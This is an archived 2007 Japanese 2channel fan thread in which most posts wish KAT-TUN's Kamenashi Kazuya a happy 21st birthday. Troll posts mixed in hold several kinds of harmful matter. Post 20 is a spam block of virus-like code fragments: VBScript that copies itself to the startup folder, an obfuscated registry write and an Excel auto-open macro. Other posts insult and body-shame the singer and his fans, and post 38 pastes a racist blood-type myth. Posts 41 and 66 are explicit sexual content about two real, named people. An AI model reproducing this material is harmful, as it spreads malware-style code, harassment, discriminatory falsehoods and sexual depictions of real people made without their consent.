5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

腕262

1 :ユー&名無しネ:2007/02/22(木) 23:58:31 ID:PNVERMCH
*sage進行*
大人じゃないヤシも大人のフリをする大人なケメスレ

前スレ 睫261 http://tv9.2ch.net/test/read.cgi/jr/1167667476/

  (   ∧∧ 過去ログ倉庫の住所☆001−250☆
⊂、⌒⊃´∀‘)⊃ttp://jbbs.livedoor.jp/bbs/read.cgi/music/1521/1105007438/158

251 ttp://tv7.2ch.net/test/read.cgi/jr/1153062931/
252 ttp://tv7.2ch.net/test/read.cgi/jr/1154091616/
253 ttp://tv7.2ch.net/test/read.cgi/jr/1155742104/
254 ttp://tv7.2ch.net/test/read.cgi/jr/1157361378/
255 ttp://tv7.2ch.net/test/read.cgi/jr/1158827415/
256 ttp://tv7.2ch.net/test/read.cgi/jr/1160460116/
257 ttp://tv7.2ch.net/test/read.cgi/jr/1161616375/
258 ttp://tv7.2ch.net/test/read.cgi/jr/1163250334/
259 ttp://tv7.2ch.net/test/read.cgi/jr/1164582592/
260 ttp://tv9.2ch.net/test/read.cgi/jr/1165744734/

>>2-10くらいお約束など

2 :ユー&名無しネ:2007/02/23(金) 00:00:07 ID:PNVERMCH
  || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
  || ☆カ○エエ、カ○イイは伏字表記。2chらしくない顔文字も禁止。
  || ☆他麺の話をケメスレでしない。他スレ不干渉。
  || ☆チャット注意。とくに脊髄反射の1行レス厳禁。
  || ☆オリキ話禁止、該当スレでおながいします。
  || ☆お客様を見かけても食いつかないでスルー。
  || ☆スレタイは「腕⇔睫(+通し番号)」で固定。
  || ☆980ぐらいでスレ立て。
  || ☆他スレで担名乗り、ケメ呼び、“でつ、まつ”語尾禁止。
  || ☆クレクレ厨や教えてチャソにならない。(気配を感じたらエサを与えない)
  || ☆ハァハァするときはメル欄でひっそり萌えること。(メル欄食い残し注意)
  ||   そのときsageチェックを忘れないように。      ΛΛ
  || ☆AA貼りすぎ注意。              \ (´∀‘) キホン☆
  ||          ・・・ご協力おながいします。   ⊂⊂  )
  ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
       (  ∧ ∧  (   ∧ ∧ (   ∧ ∧      ̄ ̄ ̄
     〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、ケメナシ先生
       〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
         〜(___ノ  〜(___ノ   〜(___ノ

3 :ユー&名無しネ:2007/02/23(金) 00:01:11 ID:PNVERMCH
  || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
  || ☆荒らしは放置が一番キライ
  ||   荒らしは常に誰かの反応を待っています
  || ☆重複スレには誘導リンクを貼って放置
  ||   ウザイと思ったらそのまま放置
  || ☆放置された荒らしは煽りや自作自演であなたのレスを誘います
  ||   ノセられてレスしたらその時点であなたの負け
  || ☆反撃は荒らしの滋養にして栄養であり最も喜ぶことです
  ||   荒らしにエサを与えないで下さい
  || ☆枯死するまで孤独に暴れさせておいて
  ||   ゴミが溜まったらまとめて削除が一番です
 ΛΛ  /   
(´∀‘)⊃  ケメナシ先生の“荒らし対策”講座でした。
/U / ________________________E[]ヨ__
U U

4 :ユー&名無しネ:2007/02/23(金) 00:02:14 ID:PNVERMCH
  || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
  || ★ 実況・チャット厳禁
  || 
  || ☆ 一言レスや相槌はやめる
  || ☆ 煽り・荒らし・電波は徹底スルー
  || ☆ 書き込む前に発言を読み返す
  || ☆ 一度発言したら、3分待つ気持ちで
  || ☆ 1分間に5レスの壁を絶対越えない
  || ☆ IE利用者は2ch専用ブラウザ推奨
  || 
  || 意識して“ゆっくりまわす”ことが重要です
  || 
 ΛΛ  /   
(´∀‘)⊃  ケメナシ先生の“鯖に優しいケメスレ”特別講座でした。
/U / ________________________E[]ヨ__
U U

5 :ユー&名無しネ:2007/02/23(金) 00:02:41 ID:Oss9opl8
スレ立て乙!目21歳オメ!

6 :ユー&名無しネ:2007/02/23(金) 00:03:16 ID:CQCNeF4s
 |
 |  『コピペ荒らしへの対応について』
 |
 |  http://www.2ch.net/accuse2.html
 |
 |        ∧_∧
 |      ( ´∀‘) / 
 |      (つ  ∩   管理側からの告知☆
 | E[]ヨ | ̄ ̄ ̄ ̄ ̄|                 
  ̄ ̄ ̄ |         | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       |          |
 | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|

7 :番犬・あきひこ:2007/02/23(金) 00:04:19 ID:CQCNeF4s
   γ''"""ヽ、
   / / ゜ ▼)
   し'ミ,´∀‘ミ ぽえーん☆
  ノ|(ノ  |)
∠,,人,,○,,ノつ

実況・チャットは絶対禁止っ☆
番組終了までレスしないでね!

8 :ユー&名無しネ:2007/02/23(金) 00:07:43 ID:9g1E/8yt
>1
乙ケメ
ケメオメ!21歳もだいしていくよ

9 :ユー&名無しネ:2007/02/23(金) 00:10:51 ID:scwOHhrN
>1
乙ケメ

ケメ21歳オメ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・* !!!!!
だいしてる

10 :ユー&名無しネ:2007/02/23(金) 00:16:08 ID:L4dSXO+D
>1

ケメ21歳オメ&忘れるところだったが竜タソも誕生日オメ

11 :ユー&名無しネ:2007/02/23(金) 00:23:22 ID:7xLrtDyx
ケメ21歳オメヾ(^▽^)ノこれからも色々あるだろうが応援してるよ

12 :ユー&名無しネ:2007/02/23(金) 00:24:41 ID:M5Qt5J4G
>1
乙ケメ
>10
総入歯そうだったな
ケメも竜も誕生日オメ!

13 :ユー&名無しネ:2007/02/23(金) 00:25:42 ID:LCTbuIvi
誕生日オメオメ
これからも自担と仲良くしてあげてくれ
おまいキャワでだいしてるよ
ではまた1年後ノシ

14 :ユー&名無しネ:2007/02/23(金) 00:30:56 ID:szsDDktg
ケメ誕生日オメ!
だいしてる

15 :ユー&名無しネ:2007/02/23(金) 00:34:03 ID:6KkwFpHw
お約束なんて貼ったところで目厨は守らないのに大変だね(w
目おめ
キョンと早く結婚して引退してくれな

16 :ユー&名無しネ:2007/02/23(金) 00:41:13 ID:/t0qDHxk
>1
乙ケメ
そしてハピバオメ*・゚゚・*:.。..。.:*・゚(n‘∀‘)η゚・*:.。..。.:*・゚゚・
いつまでもだいしてるよ

17 :ユー&名無しネ:2007/02/23(金) 00:44:35 ID:1w3WDcbB
>1
乙ケメ!
ケメ21歳オメ!!


18 :ユー&名無しネ:2007/02/23(金) 00:44:55 ID:L4dSXO+D
  (   ∧∧ 過去ログ倉庫の住所☆001−260☆
⊂、⌒⊃´∀‘)⊃ttp://jbbs.livedoor.jp/bbs/read.cgi/music/1521/1105007438/170

記念日なのでついでにまとめておいた

19 :ユー&名無しネ:2007/02/23(金) 00:56:23 ID:CQCNeF4s
>18
d!
気になってたんだ

前スレ埋まっていないのでそちらからヨロ


20 :ユー&名無しネ:2007/02/23(金) 01:09:38 ID:ys+UzKjF
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


21 :ユー&名無しネ:2007/02/23(金) 01:15:36 ID:6KkwFpHw
◆目厨(亀梨ヲタ)のお家芸◆  ※目=亀梨

・スレの流れを全く無視して「目って細いよな?白いよな?痩せてきたよな?」と同意を求める
・自作自演で目厨以外に興味の無い会話を繰り広げる
・「目担じゃないが」「他担だが」と言ってる時点で目担名乗り同然
・痛さを指摘されると全部担ナリと安置のせいにする
・立場が悪くなると、他面を叩く
・都合が悪くなると西辞めネタ、西女ネタで叩かれるのを回避しようとする
・正当な批判でもすべて鏝の叩きと言い張る
・正当な批判でもすべて他麺担の嫉妬で目チャソ可哀想   ←これ本当によく当たってるよね(w
・都合が悪くなると全て安置のせいにして現実逃避する
・都合が悪くなると台本通り・他麺の発言は他麺の嫉妬で目チャン可哀相
・「隣板から来た」「他担だが」と書いてあれば伏せてなくても注意しない
・肌が汚いのを決して認めない
・盲目に「ビズイイ」と言い張る
・タレ本人が嫌がってるらしい「キャワ」を加齢臭漂いまくるレスで連呼する
・ほとんどのレスが目スレのお約束破り(お約束なんて読んでないらしい)
・ほとんど似たような絶賛盲目レスしかしない
・深夜・明け方にせっせと自作自演でIPコロコロ変えてマンセー活動(不自然さには鈍感)

特徴→ごく出&野豚出が殆どのヲバばかり
   更年期のせいか目以外のカツン麺を叩きまくるのが趣味


チビ・短足・鼻曲がってる・すきっ歯・肌ブツブツで汚肌・絶壁・
触覚みたいな眉毛・鼻の下伸びてる・笑った時口が歪む・40婆とセックス・喫煙者・
性格卑屈・出しゃばり・気分屋・ガニ股・ゴリラ顔のくせにブリッコなキモイ男(w
ホント目厨って見当違いの被害妄想しかできなくて面白いね

22 :ユー&名無しネ:2007/02/23(金) 01:15:48 ID:8Ufouuo5
他担ですが失礼します
21歳誕生日オメ!
目やみんなにとって良い一年になることを祈りつつ今年も応援するよ
自担のボケ拾いもまたヨロ(w
*;・。.:゚:。.:*:。HAPPY BIRTHDAY。.:・゚*;・。.:゚:。.:*:

23 :ユー&名無しネ:2007/02/23(金) 01:17:32 ID:HpjIic92
●亀梨の性格●

・言い訳体質
 たとえば「青春アミーゴ」を自分一人だけカツンよりも先に出すことになった時、
 大量のカツンヲタからのバッシングを恐れていつまでもあちこちの番組で言い訳、
 「僕はジャニーさんに嫌だって言ったんです!」としつこく見苦しい言い訳を続けていた。

・責任転嫁体質
 自分に都合の悪い出来事は何でも他人のせい。とっさに他人に責任を押し付ける癖がついている。
 カツン出演番組での数々の責任転嫁や先日のゴチ番組での見苦しい発言など。

・したたかで図々しい強欲体質
 あのキムタクにさえバッタリ会った瞬間にとっさに「誕生日が近い」と圧力をかけ
 誕生日プレゼントを買わせてしまうホストのような貢がせ体質。
 普通はあんな大先輩に会ったら緊張して挨拶程度しかできないものなのに
 とっさにオネダリ言葉が言えてしまう薄汚さはやはり長年のヲタへの貢がせ経験が物を言っているのか。

・自分の為なら手段を選ばない自己中体質
 自分の立場が危うくなると、どんな汚い手を使ってでも自分のイメージアップに全力を傾ける。
 たとえば以前ヘイヘイヘイで山下に「昔亀梨のことが生理的に大嫌いだった」と発言された時は
 同じ週の山下出演のミュージックステーション(生放送)にいきなり乱入し、
 山下の曲と踊りを邪魔して必死で仲良しアピール。
 それなのに自分が出演した時のヘイヘイヘイでは他のカツンメンバーと一緒に山下を貶める。
 また、赤西の活動停止騒動では「メンバーからのコメント」に
 わざわざ「前日電話で話した」というどうでも良い言葉を入れ姑息に仲良しアピール。
 そして一件肯定しているように見せかけながらも結局は「理解に苦しむ」とバッサリ。
 挙句ちゃっかり自分のドラマの宣伝をし、ダメ押しに「オレはドラマで頑張るから」と
 ドラマの仕事を完全に干されていた赤西に嫌味たっぷり。

24 :ユー&名無しネ:2007/02/23(金) 01:19:04 ID:HpjIic92
273 :名無しさんは見た!@放送中は実況板で :2006/10/08(日) 02:25:46 ID:Upt/t05x
>>272
でも亀梨ヲタってあのニヤニヤ笑い見て
亀チャン超可愛いって叫ぶそうだよ
こっちはキモイつーの


529 :名無しさんは見た!@放送中は実況板で :2006/10/05(木) 00:41:46 ID:71ZyiLBV
『月9の失敗はもう忘れた?ジャニーズ亀梨新ドラマ会見でのはしゃぎっぷりとアブナイ流行語』

共演者と写真撮影中もお得意の首をかしげて女優よりカワイ子ぶりっ子ポーズ?
→しかしうっかり瞬きをしてしまい噂の白目に…


535 :名無しさんは見た!@放送中は実況板で :2006/10/05(木) 00:54:54 ID:Nxt35iLD
>>529
お得意の首をかしげて・・・・・って想像しただけで笑える。
自分をイケメンでカッコいいと思ってるんだろうが不細工なのが
もうバレバレで寒すぎる。


306 :名無しさんは見た!@放送中は実況板で :2006/10/11(水) 21:37:05 ID:ZdAyuM7b
こいつ顔キモイ。
輪郭キモイ。
妙に顎が四角になっててキモイ。
こいつの小学校の卒アル、キモイ。

25 :ユー&名無しネ:2007/02/23(金) 01:21:26 ID:HpjIic92
KAT−TUNが失敗したのは亀梨が身のほど知らずだったからだよ
どっからどう見ても「中居ポジ」の顔と器だった亀梨が身のほど知らず
「木村ポジ」を奪おうとしたためにこんなことになった

赤西は甘いマスクに甘い声に背も高く男前
上手く育てればポスト木村拓哉はこいつでバッチリだった
亀梨はお世辞にも二枚目とは言えない雰囲気だけの男
声もアニメ声で背も低く、クネクネした踊りとゴマすりくらいしか取り得の無い
しかも取りまとめや司会をこなすどこからどう見ても中居正広ポジションの男だった

それなのにこいつが赤西を押しのけ、異様なほど木村拓哉を崇拝し、徹底的に模倣し、
分不相応の木村ポジションを取ろうとしたのが全ての元凶、今回の悲劇への始まりだった
おとなしく中居ポジに収まり、昔からずっと中居が木村を立てまくって来たように
こいつも赤西を立ててご機嫌を取り、グループ内でのバランスを上手く取ってりゃ良かったものを
自分が成り上がりたい一心で天性の才能やアイドル気質を持っていた赤西を抹殺し
赤西から歩み寄っても徹底的に避け、しかもわざと他のメンバーと仲良く絡んだりする始末で
赤西と全く仲良くしようとせず、こいつはグループ内の人間関係を悪化させる一方だった

そうして亀梨が分不相応のポジを奪おうとし赤西を退け
グループとしての統制を保つことも放棄した結果、赤西は事実上引退
スマで言えば大黒柱・木村を失ったようなあとはカスだらけのグループが残った
亀梨がもっと身のほどを知り、グループ内の人間関係のバランスを上手く保っていたら
今回のような惨めなグループ崩壊劇は絶対に起こらなかった

26 :ユー&名無しネ:2007/02/23(金) 01:22:52 ID:RPfvFLSM
目オメデトウ。目ダイシテル。

>1
乙ケメ

27 :ユー&名無しネ:2007/02/23(金) 01:24:21 ID:/t0qDHxk
はいはいわろすわろす
ケメオメ!

28 :ユー&名無しネ:2007/02/23(金) 01:25:02 ID:AIU8Zgj0
>26
ゴミつき死ね

29 :ユー&名無しネ:2007/02/23(金) 01:27:21 ID:6KkwFpHw
27 :ユー&名無しネ:2007/02/23(金) 01:24:21 ID:/t0qDHxk
はいはいわろすわろす
ケメオメ!

975 :ユー&名無しネ:2007/02/23(金) 00:13:35 ID:/t0qDHxk
ケメオメ*・゚゚・*:.。..。.:*・゚(n‘∀‘)η゚・*:.。..。.:*・゚゚・
一生オマイについていくからな
好きだ好きだ大好きだ!


粘着に何やってんの?

30 :ユー&名無しネ:2007/02/23(金) 02:19:22 ID:/Tg1UYwH
おまいの仕事に対する姿勢も言葉の寒さもダイスチだ
これからも応援してくからな
目誕生日オメ!

31 :ユー&名無しネ:2007/02/23(金) 02:37:37 ID:E/10xmu6
>30
お願いだからちゃんと伏せて
客でも深山でも各スレのルールはきちんと守ってもらわないと困る
ロムった客がまたマネするんだから

これじゃお約束貼ってくれてても何の意味もないよ('A`)

32 :ユー&名無しネ:2007/02/23(金) 02:40:46 ID:6KkwFpHw
いやいや目チャソスチスチは任意だろ(w
さすがの目担も今日はカリカリだな

33 :ユー&名無しネ:2007/02/23(金) 02:53:15 ID:kt3xXiKl
>1乙ケメ

ケメ誕生日オメ!
自分はいつもおまいに癒されてる
この仕事を選んでくれてありがとう
ケメを産んで育ててくれたご両親にありがとう
ケメを見守ってくれてるカツンの他麺にありがとう
これからも応援してる

34 :ユー&名無しネ:2007/02/23(金) 02:58:28 ID:6KkwFpHw
( ´,_ゝ`)キョンには感謝しないのか目厨は(w

35 :ユー&名無しネ:2007/02/23(金) 03:48:43 ID:UK9kTeOS
ケメオメ!
今までもこれからも
どんなオマイでもだいしてる

36 :ユー&名無しネ:2007/02/23(金) 03:56:16 ID:isfqapjO
2ヶ月ぶりくらいにここ来た
ケメおめ

37 :ユー&名無しネ:2007/02/23(金) 04:02:04 ID:8LI9nsqG
ケメオメ!
ダイシテル!そしてdd!

38 :ユー&名無しネ:2007/02/23(金) 04:24:07 ID:6KkwFpHw
某テレビ番組で紹介されたことがあるが、アフリカにすむゴリラの血液型はすべてB型である

B型差別の発祥は戦時中のヨーロッパで植民地支配を正当化するために
有色人種や奴隷にB型が多いこと、知能が低い動物にB型が多いこ とを理由にしていた
いまヨーロッパでは医学的に解明されているが、公表していないだけである

ゴリラB型の特徴
わがまま勝手、個人プレー、独走、無作法、教養がない、ずぼら、信念がない
ぶあいそ、ひねくれ、アマノジャク、無用心、上を上と見ぬ、無礼、あつかましい、
無神経、察しが悪い、非常識、秩序を乱す、落ち着きなし、あいまい。夢がなく哲学不足、
浮気性、人間として未熟、愚痴が多い、考えが甘い、気分や、ばかみたい、すぐにだまされる、
男女差別が激しい、責任感が乏しい、動物的、要は地球に必要ない


↑目にバッチリ当てはまってるね
そして目厨にもバッチリ当てはまってるだろ(w

39 :ユー&名無しネ:2007/02/23(金) 05:57:32 ID:qX860qn8
ケメオメ!
冠もオメ!
ずっとダイシテル!

40 :ユー&名無しネ:2007/02/23(金) 08:00:55 ID:ZZKF74Ni
早くキョンと結婚して引退してね!

41 :ユー&名無しネ:2007/02/23(金) 08:19:00 ID:T9vCeyS6
       ★ 本日の亀蟲夫妻の営み ★

               ∧_∧
              ( ゜ё`.) -=3 <そろそろ始めようか今日子
             (,,う;;;;;;;;;;;;;;;;'(,,)  ←亀蟲 
             /,;;;'" ,,,,  !;;;)    ∧_∧<イやン和くんのスケベ
              ゙! (U) l、    ( ・ω・*)←今日子ちゃん 
              ゙'-‐''゙''-‐''゙  
    パンパン
ズコバコ  ,ィヘ⌒ヽフ ←亀蟲
    / (  ゜ё`.)) -=3 <今日子のユルマン最高…ウッ
 ε//   し ヘ⌒ヽフ   アアン
  ( (  _,.ノ( *・ω・)) -=3 <イやン和くんのスケベ 
   し しー し─J さ ←今日子ちゃん

42 :ユー&名無しネ:2007/02/23(金) 08:19:25 ID:PNz6xprT
ケメ21歳オメ!
先週からのモロモロ合わせて最高のハピバだ(*´∀`)
いつも元気くれるケメほんとにありがd

43 :ユー&名無しネ:2007/02/23(金) 08:22:00 ID:TknJVMm7
ケメオメ!
ガンガッてる目がダイスチだ!
今年が目にとって最高の年になりますように…

44 :ユー&名無しネ:2007/02/23(金) 08:29:12 ID:BHKmqI7s
337:名無しさん@お腹いっぱい。 :2007/02/23(金) 08:15:27 [sage]
★「蒼き狼」世界60カ国配給契約成立
★加護亜依 事務所でお茶汲み修行中…復帰に向けて上京?
★紀香「いや〜な気分」…「初夜はどうでした!?」にア然
★安達祐実のママが女優デビュー…映画「ふぞろいな秘密」
★TBS新番組発表…みの「キャプテン☆ドみの」オリラジ「ドッカ〜ン!」
★亀梨&小泉「同棲」に発展し…両親にも紹介済み

45 :ユー&名無しネ:2007/02/23(金) 08:38:12 ID:lsQ0eHhA
>1
乙ケメー
メール欄イイ!

46 :ユー&名無しネ:2007/02/23(金) 08:45:38 ID:oheNXSQA
ケメオメ!
ケメオメ!

47 :ユー&名無しネ:2007/02/23(金) 09:55:20 ID:Qxq3e60d
(´∀‘)ケメオメデd!
自分は他担だが常に目担姐さんと一緒にいるから
目のことはよく見てるよ
本当にガンガッテるとオモー
悪い噂に負けず21歳も幸あれ!(´∀‘)
あらためてオメ!

48 :ユー&名無しネ:2007/02/23(金) 10:03:25 ID:oheNXSQA
>47
悪い噂が気になる

49 :ユー&名無しネ:2007/02/23(金) 10:34:48 ID:9eWJcaoK
遅くなったがケメハピバ(*´∀`)
いつまでも応援させていただく
だからガンガレ

50 :ユー&名無しネ:2007/02/23(金) 10:46:28 ID:scwOHhrN
他担姐さんお祝いのレスdです

テンソン上がりすぎてオメレスで伏せ忘れてたスマソ
ケメが健康で楽しく過ごせますように(-人-)ナモナモ

51 :ユー&名無しネ:2007/02/23(金) 11:29:11 ID:8lqaXLd/
ケメハピバ!
これからもイパーイ応援スルヨ

52 :ユー&名無しネ:2007/02/23(金) 12:09:57 ID:jkyWePWO
ケメオメ!

53 :ユー&名無しネ:2007/02/23(金) 12:58:52 ID:BfHAeJqS
他担ですが失礼します
ケメ21歳オメ!
紺に冠と忙しくなるけどがんがってる姿をちゃんと応援してるからな
また自担とも絡んでやってくれ
ケメとケメ担姐さん達にとって良い1年となりますように

54 :ユー&名無しネ:2007/02/23(金) 13:08:13 ID:wlvGBSDI
ケメ21サイオメオメオメオメ!
いつまでも応援する
いつまでもついてくよ

55 :ユー&名無しネ:2007/02/23(金) 13:35:49 ID:Bdq6Fee6
>1
乙ケメ

遅ればせながらケメおめ!
他担姐さんもオメレスありがd!
これからもずっと応援するのでいつまでもキャ○なおまいでいてね
紺も冠番組も全部楽しみだ(*´∀`)


56 :ユー&名無しネ:2007/02/23(金) 14:11:40 ID:jenyzKjt
目担ってヲバ主婦多いのバレバレだな(pgr
三十路四十路のババアが必死w

57 :ユー&名無しネ:2007/02/23(金) 14:52:15 ID:9mGrXYvJ
ケメ21サイオメッ!(*´∀`)
コレカラもオウエンするゾー!

58 :ユー&名無しネ:2007/02/23(金) 14:54:38 ID:a8BIL0uU
ケメハピバ!
久々に此所来た
これからも応援させてもらうよ

59 :ユー&名無しネ:2007/02/23(金) 16:31:22 ID:+Jhp5dF2
ケメオメ!

60 :ユー&名無しネ:2007/02/23(金) 16:44:23 ID:eiSGuLUZ
>57
お約束守ってね

61 :ユー&名無しネ:2007/02/23(金) 18:48:32 ID:W9ymthzc
出遅れたがケメハピバ!ケーキウマー゚+.(・∀・)゚+.゚
初めてケメを見た時あんなガキンチョだたのに21歳だなんて感慨深い
みんなに幸あれと願ったケメにも幸あれ

62 :ユー&名無しネ:2007/02/23(金) 19:46:56 ID:oKf7zI+n
他担ですが失礼します
ケメ21歳オメ.。゚+.(・∀・).゚+.゚
真摯な姿のケメもハイテンソンなケメもだいしてるぞ
くれぐれも健康と体には気をつけてね
今は自担が色々迷惑かけて禿スマソですがまた一緒にご飯食べてください
ケメそしてケメ担姐さん達にとって幸せな一年になりますように

63 :ユー&名無しネ:2007/02/23(金) 20:08:48 ID:6KkwFpHw
40婆のマンソンに通いまくり2回もマヌケに撮られ
仕事でも公私混同しまくってる奴のどこが真摯なんだよ( ´,_ゝ`)
ヲバ厨の都合の良い脳内変換っておめでてーな(w

64 :ユー&名無しネ:2007/02/23(金) 20:27:39 ID:hcEuu5Kv
久しぶりに来たからレス変だったらスマソ
誕生日オメ!
ケメを知ってス○な人がイパーイ増えた
前向きさ見習ったら夢に手が届いた
姿見るだけで疲れが吹っ飛んで元気になる
ケメをス○になってほんとに良かった
今は大変でチェックできない時もあるがずっと応援してるよ

65 :ユー&名無しネ:2007/02/23(金) 21:01:51 ID:BVoXH7HE
亀梨の共演者殺しのせいで美咲はいまだに散々です・・・><


伊東美咲はなぜ連ドラに出られないのか (ゲンダイネット)
“視聴率女王”争いから脱落したのか?

4月からスタートする連続ドラマのラインアップが続々と決まる中、伊東美咲(29)の名前が出てこない。

美咲は05年のドラマ「電車男」でヒロインを演じて人気が急上昇。以後、月9ドラマ「危険なアネキ」と「サプリ」(いずれもフジテレビ)
に立て続けに出演し、一躍、視聴率女優の仲間入りを果たした。

美咲は、その女優が出演することでアップするであろう視聴率を数値化した「潜在視聴率ランキング」でも、14.3%で仲間由紀恵、
篠原涼子に次ぐ3位にランクインしている。

そんなトップ女優が06年夏の「サプリ」以来、3クールも連ドラから遠ざかっている。今春放送予定の特別ドラマ「めぞん一刻」(テレビ朝日)
以外、ドラマの仕事は入っていないのだ。

「彼女は“演技が単調で微妙な感情を表現し切れない”と評価が芳しくない。『サプリ』は平均視聴率14.2%とイマイチでした。その一方で
潜在視聴率ランキングの順位がアップしたため、ギャラは1時間あたり150万円以上の『2A』から250万円以上の『5A』に上がった。
これでテレビ局は逆に使いづらくなってしまったんです」(テレビ関係者)

美咲は“視聴率女王”に復帰できるのか。答えは今年ドラマでヒットを飛ばせるかどうかにかかっている。

66 :ユー&名無しネ:2007/02/23(金) 21:04:17 ID:T9vCeyS6
★亀梨和也×小泉今日子★
亀梨「…今日子のココ‥‥すっげーやわらかくて入っちゃったのに…ナカはキツイなー」
小泉「解説なん、て‥‥いーからっ」
だからはやくちょうだい。…なんて、今日子の目が見上げてくる。いいんですか?遠慮なく食べちゃいますよ…子猫さん?
亀梨「…いくかんね」
今日子の腰をつかんで持ち上げ、ヌルつく蕾に固くそそり立った亀梨自身を押し付けると、誘うようにヒクつくそことひたすらに頷く今日子。
お言葉に甘えて、グプリと。一気に最奥まで腰を進めた。
小泉「は、ぁ‥ッ!」
亀梨「…っキツ…!」
入口はやわらかいくせに奥へ行くほどキツイ。抵抗してくる熱くやわらかい内壁に逆らって進むとありえないくらいにキモチイイ。
亀梨「今日子ちゃんったら、名器。」
小泉「そゆこと…ゆわないでバカっ!‥‥ぁ」
怒鳴った拍子にお腹に力が加わったらしく、しめつけてくる今日子ちゃん。
真っ赤に染まった相手を見たら、更に後孔を拡張するように自身が育ってしまう。
小泉「いぁッ‥かず、や」
亀梨「も‥‥ごめ、限界」
まだ入れたばかりなのに。まだまだ今日子のナカにいたいのに…。あまりにも、心地良すぎる。
亀梨「…いくよ」
折れてしまいそうな細い腰を抱え、大きく腰をグラインドさせる。
今日子の背が弓なりになれば細かくリズムを刻み、ふとした瞬間に腰を回転させてプクリと膨らんだ場所をえぐりあげて。
小泉「ひぁッあ、やぅ‥‥あぁッ!」
ここが外だなんて事も忘れてひたすらに。
今日子の喘ぎと濡れた水音。肌のぶつかりあう音が織り成す狂想曲。‥‥すべてが俺亀梨と今日子を狂わせる。
小泉「んんーッも、だめ‥かず、やァ…っ」
亀梨「ん、一緒…いこ?」
今日子の腕が俺の首筋にまわされ、コクコク頷いたのと同時に腰を後孔から抜けるほど引き、一気に奥へと叩き付ける。
ズコバコ  ,ィヘ⌒ヽフ  ブヒブヒ
    / (; ゜ё`.)) -=3   ←亀梨
 ε//   し ヘ⌒ヽフ   アアン
  ( (  _,.ノ( *・ω・)) -=3   ←今日子ちゃん
   し しー し─J さ
低視聴率にも関わらずセクロスしまくりの亀梨×今日子

67 :ユー&名無しネ:2007/02/23(金) 21:12:39 ID:51o6Llg9
>68
それどこのコピペ?

68 :ユー&名無しネ:2007/02/23(金) 21:24:20 ID:J2dFzcLE
他担ですがケメたそオメ!

69 :ユー&名無しネ:2007/02/23(金) 21:48:04 ID:/L/aTVdo
目オメ
いつまでも魅力的な目でいてください
○イシテル

25 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)